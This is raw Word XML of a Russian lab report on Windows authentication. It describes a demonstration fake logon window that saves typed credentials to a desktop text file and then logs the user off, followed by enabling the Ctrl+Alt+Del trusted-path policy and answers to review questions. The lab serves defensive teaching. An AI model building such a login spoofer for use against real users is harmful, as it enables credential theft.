      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:instrText xml:space="preserve"> REF _Ref194422754 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Рисунок 4</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">), обладающее таким же функционалом как и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logon</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">-окно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t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3686810" cy="2576195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4740" t="5989" r="14843" b="15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bookmarkStart w:id="7" w:name="_Ref194422754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bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> – фиктивное </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logon</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-окно</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>При вводе учетных данных программа:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Записывает их в текстовый файл (%USERPROFILE%\Desktop\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.txt в демонстрационном варианте) (</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:instrText xml:space="preserve"> REF _Ref194422964 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Рисунок 5</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Генерирует ошибку «Неверные данные» (</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:instrText xml:space="preserve"> REF _Ref194422951 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Рисунок 6</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Инициирует завершение сеанса через ExitWindowsEx(0, 0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="99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56"/>
        <w:gridCol w:w="4955"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/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before="0" w:after="0"/>
              <w:ind w:hanging="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2340610" cy="1971040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="5" name="Рисунок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990" t="1028" r="55209" b="496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610" cy="197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Caption"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:bookmarkStart w:id="8" w:name="_Ref194422964"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Рисунок </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:bookmarkEnd w:id="8"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>файл с данными</w:t>
            </w:r>
          </w:p>
        </w:tc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before="0" w:after="0"/>
              <w:ind w:hanging="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="9" w:name="_Ref194422054"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2458085" cy="1856105"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="6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8085" cy="1856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9"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Caption"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="10" w:name="_Ref194422951"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Рисунок </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:bookmarkEnd w:id="10"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> - ошибка "Неверный данные"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing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" w:cs=""/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>После завершения работы программы система возвращает управление штатному механизму аутентификации Windows. Успешный ввод учетных данных приводит к загрузке рабочего стола, при этом перехваченная информация сохраняется в указанном файле.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Включение механизма доверенного пути</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="708"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Для включения механизма доверенного пути был изменён параметр</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="708"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">локальной политики: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">«Интерактивный вход в систему: не требовать нажатия </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CTRL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ALT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> на значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">«Отключен» </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:instrText xml:space="preserve"> REF _Ref194423771 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Рисунок 7</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="true"/>
        <w:ind w:hanging="0" w:left="708"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4434205" cy="2783205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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20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bookmarkStart w:id="11" w:name="_Ref194423771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bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> - Изменение локальной политики</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Повторное тестирование программы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="true"/>
        <w:ind w:firstLine="851" w:left="565"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">При повторном проведении тестирования в программном эмуляторе было зафиксировано, что комбинация клавиш </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTRL + ALT + DEL</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> инициирует вывод интерфейса безопасности операционной системы (</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:instrText xml:space="preserve"> REF _Ref194586738 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Рисунок 8</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">). В данном режиме доступна диагностика системных процессов, включая проверку состояния процесса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, который в момент тестирования находился в неактивном состоянии, что свидетельствует о </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="114300" distR="114300" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1670050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>617220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4400550" cy="3644900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-2" y="0"/>
                <wp:lineTo x="-2" y="21448"/>
                <wp:lineTo x="21503" y="21448"/>
                <wp:lineTo x="21503" y="0"/>
                <wp:lineTo x="-2" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="8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программе-имитаторе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Ref194586738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bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> - экран безопасности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Heading1"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ответы на контрольные вопросы</w:t>
      </w:r>
    </w:p>
    <w:p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Что такое аутентификация? Чем она отличается от идентификации?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Идентификация</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — присвоение субъектам и объектам системы уникальных идентификаторов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Аутентификация</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — проверка соответствия заявленной идентичности, то есть подтверждение того, что пользователь действительно является тем, за кого себя выдает.</w:t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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Какие основные угрозы направлены на систему аутентификации в</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>операционной системе Windows?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Угадывание пароля:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Злоумышленник может использовать методы полного перебора или интеллектуального поиска для подбора пароля. Слабые пароли (например, короткие или состоящие из простых комбинаций) особенно уязвимы к таким атакам.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Компрометация файла паролей:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Если злоумышленник получает доступ к файлу, где хранятся хэши паролей, он может использовать методы перебора для восстановления исходных паролей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Подмена подсистемы аутентификации:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Злоумышленник может внедрить программу ложного логина (fake login), которая имитирует интерфейс входа в систему и перехватывает учетные данные пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p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Какие существуют основные методы противодействия угрозам?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Противодействие угадыванию пароля:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Регулярное изменение паролей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Использование сложных паролей, включающих цифры, буквы разных регистров и специальные символы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ограничение числа попыток ввода пароля.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Использование утилит для проверки стойкости паролей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Защита файла паролей:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Использование хэш-функций для хранения паролей. Хэширование делает невозможным восстановление пароля из сохраненного значения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Контроль доступа к файлам паролей, чтобы предотвратить их несанкционированное чтение или изменение.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Добавление "соли" (случайной строки) к хэш-функции для усложнения перебора.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Противодействие подмене подсистемы аутентификации:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Использование механизма доверенного пути (trusted path), который гарантирует, что пользователь взаимодействует только с настоящей системой аутентификации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Взаимная аутентификация, при которой система подтверждает свою подлинность пользователю.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Общие меры безопасности:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Регулярное обновление операционной системы и программного обеспечения для устранения уязвимостей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Использование антивирусных программ и систем обнаружения вторжений.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="851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4. Опишите работу механизма доверенного пути в операционной</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="851"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>систем Windows? В чем ее отличия от реализации механизма доверенного пути в Unix-системах?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="851"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Механизм доверенного пути в Windows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>В Windows механизм доверенного пути реализован через системный процесс WinLogon, который отвечает за аутентификацию пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
